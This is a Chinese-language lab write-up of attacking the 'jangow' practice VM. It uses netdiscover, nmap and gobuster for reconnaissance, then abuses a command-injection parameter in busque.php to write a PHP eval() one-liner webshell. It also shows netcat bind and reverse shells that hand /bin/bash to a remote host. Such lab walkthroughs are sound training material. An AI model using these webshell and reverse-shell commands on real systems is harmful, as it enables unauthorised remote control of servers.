靶机环境 jangow入侵过程(2) 一句话木马 +反弹shell
** 测试 VMware不能识别网卡启动 使用virtualbox, 使用box 的桥接方式,放到物理网络,dhcp自动获取IP,看dhcp 找到IP地址**
netdiscover -r 10.0.0.0/24 -i eth0 扫描主机网段
nmap -sC -sV -p - 10.0.0.162 -v 扫描单个主机
# 使用gobuster 扫描一下 目录
apt-cache show gobuster # 查看一下gobuster 的版本
Package: gobuster
Version: 3.1.0-0kali1
Architecture: amd64
Maintainer: Kali Developers <devel@kali.org>
Installed-Size: 7404
Depends: libc6 (>= 2.4)
gobuster -h # 查看一下gobuster帮助
Command 'gobuster' not found, but can be installed with:
apt install gobuster
Do you want to install it? (N/y)y #哦?? 没有安装, 那安装一下
apt install gobuster
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成
下列【新】软件包将被安装:
# 使用一下


Ox01 情况分析!
# 能够执行远程系统命令的话,有三种渗透手法
# 1、使用系统命令查找敏感文件,找到系统用户 或者密码文件,远程登录系统 (上一篇使用的这种方式,缺点的 真实环境的话不可能登录console控制台)
# 2、使用文件上传漏洞,上传webshell 拿到控制权
# 3、使用执行命令反弹shell 拿到控制权
Ox02 文件上传
使用一句话木马 写入文件 <?php eval($_POST["333"]);?>
windows 下写入 echo ^<?php eval($_POST["123"]);?^> >1.php ^是为了转义 大于号的 ,不能使用引号 或者 \ 反斜线
linux 下写入 $符号变量的问题 echo '<?php eval($_POST["123"]);?>'>1.php
http://192.168.10.184/site/busque.php?buscar=echo '<?php eval($_POST["123"]);?>'>1.php
# 游览器写入 或者 burp 写入都可以(注意编码一下)
https://github.com/eastmountyxz/AntSword-Experiment




上传大马 ,,好像不大行 访问不到!!!!
server端口开启监听
nc -lvnp 4444 -e /bin/bash
开启192.168.1.1 的监听端口444 并且把本机的 shell 给到任何连进来的机器
# 主动把shell 推送给其他人 ,别人只要链接到我就可以
nc -v 192.168.1.1 4444
链接192.168.1.1的端口,并且接受对方的控制shell
# 链接到服务端,并且接受对方的shell ,控制远端电脑
nc -lvnp 4444
开启192.168.1.1 的监听端口444
nc -v 192.168.1.1 4444 -e /bin/bash
# CenOS ubuntu 等其他版本不能使用-e 参数 https://github.com/swisskyrepo/PayloadsAllTheThings 可以使用 bash python 等解释器
谁提供端口的监听 ,谁作为主发起者
谁把自己的程序暴露出来 ,谁作为被控端
只能走提权的老路!!!!
** 443 端口无法反弹shell php 解释器无法执行**

浙公网安备 33010602011771号